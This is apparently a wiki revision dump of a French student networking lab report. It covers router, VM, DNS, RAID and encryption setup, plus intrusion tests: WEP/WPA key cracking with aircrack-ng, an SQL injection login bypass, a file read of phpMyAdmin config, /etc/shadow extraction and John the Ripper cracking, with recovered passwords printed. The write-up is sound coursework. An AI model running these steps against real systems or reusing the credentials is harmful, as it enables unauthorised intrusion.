Depuis la page ''Recherche d'un manuel'', nous avons pû télécharger ce fichier, qui nous a indiqué le mot de passe du compte phpmyadmin : '''gencovid19'''.<br/><br />
<br />
2. PHPMyAdmin<br />
<br />
Nous avons donc ouvert l'URL http://honey.plil.info/phpmyadmin dans un navigateur, et nous nous connectons avec le compte root:gencovid19<br />
Dans PHPMyAdmin, nous trouvons un DB test avec des identifiants : rex:plainpassword <br />
<br />
3. Récupération de fichiers avec l'user rex<br />
<br />
Nous avons donc réussi à nous connecter en SSH au serveur, et nous avons récupéré les fichiers /etc/passwd et /etc/shadow.<br/><br />
Nous avons lancé la commande :<br />
unshadow /etc/passwd /etc/shadow | head -1 > mdp<br />
Nous avons obtenu un fichier avec le mot de passe root haché.<br />
<br />
5. Decryptage du mot de passe root avec John the Ripper<br />
<br />
Pour casser le mot de passe, nous avons utilisé John the Ripper. Nous nous sommes aidé des indications : "mot de passe présentant les mêmes caractéristiques que le mot de passe root habituel".<br/><br />
Nous avons créé un dictionnaire de mots de 4 lettres : <br />
crunch 4 4 abcdefghijklmnopqrstuvwxyz > dict<br />
<br />
Pour obtenir des mots de 8 lettres (en duplicant les mots de 4 lettres), nous avons utilisé sed : <br />
sed -i 's/\(.*\)/\1\1/'<br />
La dernière étape consistait à lancer JtR :<br />
john -w:dict mdp<br />
Après 5 minutes d'attente, le mot de passe vu cracké.<br/><br />
Avec la commande : <br />
john --show mdp<br />
On obtient le mot de passe : '''fortfort'''.</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=57777TP sysres IMA5 2021/2022 G72022-01-10T17:38:37Z<p>Avercaem : /* Tests d’intrusion */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
== Architecture réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
//allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 3600<br />
@ IN SOA (<br />
ns.anosteke.site.<br />
ns6.gandi.net.<br />
2;<br />
3600;<br />
3600;<br />
3600;<br />
3600;<br />
)<br />
<br />
IN NS ns6.gandi.net. <br />
www IN A 193.48.57.182<br />
ns IN CNAME www<br />
<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
=== Sécurisation de site par certificat ===<br />
On crée une demande de certificat avec la commande : <br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr<br />
<br />
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. <br />
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.<br />
<br />
=== Sécurisation de serveur DNS par DNSSEC ===<br />
<br />
On ajoute à notre fichier named.conf.options les paramètres suivants : <br />
<br />
dnssec-enable yes; //Activer le dnssec, même si déprécié sur notre version<br />
dnssec-validation yes; //FOrcer le dnssec<br />
<br />
On génère ensuite nos clés, dans un fichier connus<br />
<br />
cd /etc/bind/master<br />
dnssec-keygen -a NSEC3RSASHA1 -b 2048 -n ZONE anosteke59.site <br />
//Kanosteke59.site.+007+15849<br />
dnssec-keygen -f KSK -a NSEC3RSASHA1 -b 4096 -n ZONE anosteke59.site<br />
//Kanosteke59.site.+007+60636<br />
<br />
ici on crée une clé pour du SHA-1<br />
ON peut ensuite renommer les fichiers <br />
<br />
mv Kanosteke59.site.+007+60636.key Kanosteke59.site.ksk.key<br />
mv Kanosteke59.site.+007+60636.private Kanosteke59.site.ksk.private<br />
mv Kanosteke59.site.+007+15849.key Kanosteke59.site.zsk.key<br />
mv Kanosteke59.site.+007+15849.private Kanosteke59.site.zsk.private<br />
<br />
On ajoute dans la fin de définition du domaine :<br />
<br />
$TTL 3600<br />
<br />
...<br />
<br />
$INCLUDE Kanosteke59.site.zsk.key<br />
$INCLUDE Kanosteke59.site.ksk.key<br />
<br />
On signe maintenant nos fichier de définition<br />
dnssec-signzone -o anosteke59.site -k Kanosteke59.site.ksk anosteke59.site Kanosteke59.site.zsk<br />
<br />
On modifie ensuite notre fichier '/etc/bind/named.conf.options' pour pointer sur ce nouveau fichier signé<br />
zone "anosteke59.site" {<br />
type master;<br />
file "/etc/bind/master/anosteke59.site.signed";<br />
notify yes;<br />
};<br />
<br />
j'ai vérifié la config final avec : https://dnssec-analyzer.verisignlabs.com/anosteke59.site<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
<br />
Après un rédémarrage de la VM on execute <br />
<br />
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3<br />
<br />
On formate la partition:<br />
<br />
mkfs.ext4 /dev/md0<br />
<br />
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
et on valide les modifications:<br />
<br />
mount -a<br />
<br />
=== Chiffrement de données ===<br />
<br />
Pour démarrer, nous formatons la clé :<br />
mkfs.ext4 /dev/sdb<br />
<br />
A l'aide de ''cryptsetup'', nous initialisons la clé USB avec l'option luksFormat et choisissons un mot de passe :<br />
cryptsetup luksFormat /dev/sdb<br />
<br />
Nous ouvrons ensuite notre partition chiffrée et créons le nom du volume : crypte <br />
cryptsetup luksOpen /dev/sdb crypte<br />
Puis nous le formatons<br />
mkfs.ext4 /dev/mapper/crypte <br />
<br />
Nous montons ensuite la partition afin d'y ajouter un fichier test :<br />
mkdir /mnt/cryptUSB<br />
mount -t ext4 /dev/mapper/crypte /mnt/cryptUSB/<br />
<br />
Nous créons ce fichier test.txt en y inscrivant "BONJOUR MONDE !" :<br />
nano /mnt/cryptUSB/test.txt<br />
<br />
Enfin, nous démontons et fermons le volume chiffré :<br />
umount /mnt/cryptUSB<br />
cryptsetup luksClose crypte<br />
<br />
Afin de vérifier le cryptage de la clé, nous le mettons sur un autre PC. On se rend compte que le mot de passe est obligatoire pour accéder aux fichiers<br />
<br />
== Tests d’intrusion ==<br />
<br />
=== WEP ===<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start wlan0mon 4<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 4 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.<br />
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44<br />
<br />
=== WPA ===<br />
<br />
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :<br />
<br />
airodump-ng -c 9 wlan0mon<br />
<br />
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :<br />
<br />
airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon<br />
<br />
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :<br />
<br />
crunch 8 8 0123456789 -o password.lst<br />
<br />
Enfin, on lance la commande :<br />
<br />
aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap<br />
<br />
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999<br />
<br />
=== Intrusion serveur WEB ===<br />
<br />
Dans un premier temps, nous réalisons une injection sql afin de récupérer la liste de tous les utilisateurs du site honey.plil.info. Nous choisissons comme utilisateur "' or 1=1; --"<br />
<br />
Nous nous connectons avec le compte administrateur. Dans un des fichiers, nous trouvons des allusions à PHPMyAdmin.<br />
De là, 3 menus, dont 2 sont intéressants. Dans l'onglet ''gestion des manuels'', on peut ajouter un fichier depuis le serveur.<br/><br />
Ainsi, nous avons ajouté le fichier /etc/phpmyadmin/config-db.php.<br/><br />
<br />
Depuis la page ''Recherche d'un manuel'', nous avons pû télécharger ce fichier, qui nous a indiqué le mot de passe du compte phpmyadmin : '''gencovid19'''.<br/><br />
<br />
2. PHPMyAdmin<br />
<br />
Nous avons donc ouvert l'URL http://honey.plil.info/phpmyadmin dans un navigateur, et nous nous connectons avec le compte root:gencovid19<br />
Dans PHPMyAdmin, nous trouvons un DB test avec des identifiants : rex:plainpassword <br />
<br />
3. Récupération de fichiers avec l'user rex<br />
<br />
Nous avons donc réussi à nous connecter en SSH au serveur, et nous avons récupéré les fichiers /etc/passwd et /etc/shadow.<br/><br />
Nous avons lancé la commande :<br />
unshadow /etc/passwd /etc/shadow | head -1 > mdp<br />
Nous avons obtenu un fichier avec le mot de passe root haché.<br />
<br />
5. Decryptage du mot de passe root avec John the Ripper<br />
<br />
Pour casser le mot de passe, nous avons utilisé John the Ripper. Nous nous sommes aidé des indications : "mot de passe présentant les mêmes caractéristiques que le mot de passe root habituel".<br/><br />
Nous avons créé un dictionnaire de mots de 4 lettres : <br />
crunch 4 4 abcdefghijklmnopqrstuvwxyz > dict<br />
<br />
Pour obtenir des mots de 8 lettres (en duplicant les mots de 4 lettres), nous avons utilisé sed : <br />
sed -i 's/\(.*\)/\1\1/'<br />
La dernière étape consistait à lancer JtR :<br />
john -w:dict mdp<br />
Après 5 minutes d'attente, le mot de passe vu cracké.<br/><br />
Avec la commande : <br />
john --show mdp<br />
On obtient le mot de passe : '''fortfort'''.<br />
<br />
== Intrusion sur un serveur d’application Web ==<br />
<br />
<br />
<br />
=== Chiffrement de données ===<br />
=== Inspection ARP par un élément réseau ===<br />
=== Sécurisation WiFi par WPA2-EAP ===</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=57771TP sysres IMA5 2021/2022 G72022-01-10T17:27:33Z<p>Avercaem : /* WPA */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
== Architecture réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
//allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 3600<br />
@ IN SOA (<br />
ns.anosteke.site.<br />
ns6.gandi.net.<br />
2;<br />
3600;<br />
3600;<br />
3600;<br />
3600;<br />
)<br />
<br />
IN NS ns6.gandi.net. <br />
www IN A 193.48.57.182<br />
ns IN CNAME www<br />
<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
=== Sécurisation de site par certificat ===<br />
On crée une demande de certificat avec la commande : <br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr<br />
<br />
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. <br />
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.<br />
<br />
=== Sécurisation de serveur DNS par DNSSEC ===<br />
<br />
On ajoute à notre fichier named.conf.options les paramètres suivants : <br />
<br />
dnssec-enable yes; //Activer le dnssec, même si déprécié sur notre version<br />
dnssec-validation yes; //FOrcer le dnssec<br />
<br />
On génère ensuite nos clés, dans un fichier connus<br />
<br />
cd /etc/bind/master<br />
dnssec-keygen -a NSEC3RSASHA1 -b 2048 -n ZONE anosteke59.site <br />
//Kanosteke59.site.+007+15849<br />
dnssec-keygen -f KSK -a NSEC3RSASHA1 -b 4096 -n ZONE anosteke59.site<br />
//Kanosteke59.site.+007+60636<br />
<br />
ici on crée une clé pour du SHA-1<br />
ON peut ensuite renommer les fichiers <br />
<br />
mv Kanosteke59.site.+007+60636.key Kanosteke59.site.ksk.key<br />
mv Kanosteke59.site.+007+60636.private Kanosteke59.site.ksk.private<br />
mv Kanosteke59.site.+007+15849.key Kanosteke59.site.zsk.key<br />
mv Kanosteke59.site.+007+15849.private Kanosteke59.site.zsk.private<br />
<br />
On ajoute dans la fin de définition du domaine :<br />
<br />
$TTL 3600<br />
<br />
...<br />
<br />
$INCLUDE Kanosteke59.site.zsk.key<br />
$INCLUDE Kanosteke59.site.ksk.key<br />
<br />
On signe maintenant nos fichier de définition<br />
dnssec-signzone -o anosteke59.site -k Kanosteke59.site.ksk anosteke59.site Kanosteke59.site.zsk<br />
<br />
On modifie ensuite notre fichier '/etc/bind/named.conf.options' pour pointer sur ce nouveau fichier signé<br />
zone "anosteke59.site" {<br />
type master;<br />
file "/etc/bind/master/anosteke59.site.signed";<br />
notify yes;<br />
};<br />
<br />
j'ai vérifié la config final avec : https://dnssec-analyzer.verisignlabs.com/anosteke59.site<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
<br />
Après un rédémarrage de la VM on execute <br />
<br />
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3<br />
<br />
On formate la partition:<br />
<br />
mkfs.ext4 /dev/md0<br />
<br />
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
et on valide les modifications:<br />
<br />
mount -a<br />
<br />
=== Chiffrement de données ===<br />
<br />
Pour démarrer, nous formatons la clé :<br />
mkfs.ext4 /dev/sdb<br />
<br />
A l'aide de ''cryptsetup'', nous initialisons la clé USB avec l'option luksFormat et choisissons un mot de passe :<br />
cryptsetup luksFormat /dev/sdb<br />
<br />
Nous ouvrons ensuite notre partition chiffrée et créons le nom du volume : crypte <br />
cryptsetup luksOpen /dev/sdb crypte<br />
Puis nous le formatons<br />
mkfs.ext4 /dev/mapper/crypte <br />
<br />
Nous montons ensuite la partition afin d'y ajouter un fichier test :<br />
mkdir /mnt/cryptUSB<br />
mount -t ext4 /dev/mapper/crypte /mnt/cryptUSB/<br />
<br />
Nous créons ce fichier test.txt en y inscrivant "BONJOUR MONDE !" :<br />
nano /mnt/cryptUSB/test.txt<br />
<br />
Enfin, nous démontons et fermons le volume chiffré :<br />
umount /mnt/cryptUSB<br />
cryptsetup luksClose crypte<br />
<br />
Afin de vérifier le cryptage de la clé, nous le mettons sur un autre PC. On se rend compte que le mot de passe est obligatoire pour accéder aux fichiers<br />
<br />
== Tests d’intrusion ==<br />
<br />
=== WEP ===<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start wlan0mon 4<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 4 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.<br />
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44<br />
<br />
=== WPA ===<br />
<br />
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :<br />
<br />
airodump-ng -c 9 wlan0mon<br />
<br />
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :<br />
<br />
airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon<br />
<br />
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :<br />
<br />
crunch 8 8 0123456789 -o password.lst<br />
<br />
Enfin, on lance la commande :<br />
<br />
aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap<br />
<br />
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999<br />
<br />
== Intrusion sur un serveur d’application Web ==<br />
<br />
<br />
<br />
=== Chiffrement de données ===<br />
=== Inspection ARP par un élément réseau ===<br />
=== Sécurisation WiFi par WPA2-EAP ===</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=57770TP sysres IMA5 2021/2022 G72022-01-10T17:27:26Z<p>Avercaem : /* WEP */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
== Architecture réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
